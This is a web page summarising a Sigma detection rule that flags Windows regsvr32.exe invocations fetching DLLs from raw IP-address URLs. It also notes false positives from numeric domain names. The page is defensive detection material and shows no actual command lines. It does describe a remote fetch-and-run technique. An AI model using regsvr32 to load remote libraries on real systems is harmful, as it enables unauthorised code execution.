heroui logo

Potentially Suspicious Regsvr32 HTTP IP Pattern

Sigma Rules

View Source
Summary
This detection rule identifies potentially suspicious usage of the Windows executable 'regsvr32.exe', which is commonly used to register and unregister DLLs. The specific focus is on scenarios where 'regsvr32' is invoked in a manner that retrieves DLLs from remote locations identified solely by IP addresses. Such behavior can be indicative of an attempt to download malicious or unauthorized libraries for execution on the target system. The rule leverages command line arguments that include specific HTTP and HTTPS patterns referring to numerical placeholders for IP addresses. Anomalies may arise through registered Windows processes that shouldn't normally pull resources from direct IP links, raising flags for further investigation. False positives are noted for non-malicious cases where domains begin with numerical characters, such as legitimate software downloads.
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
Created: 2022-01-11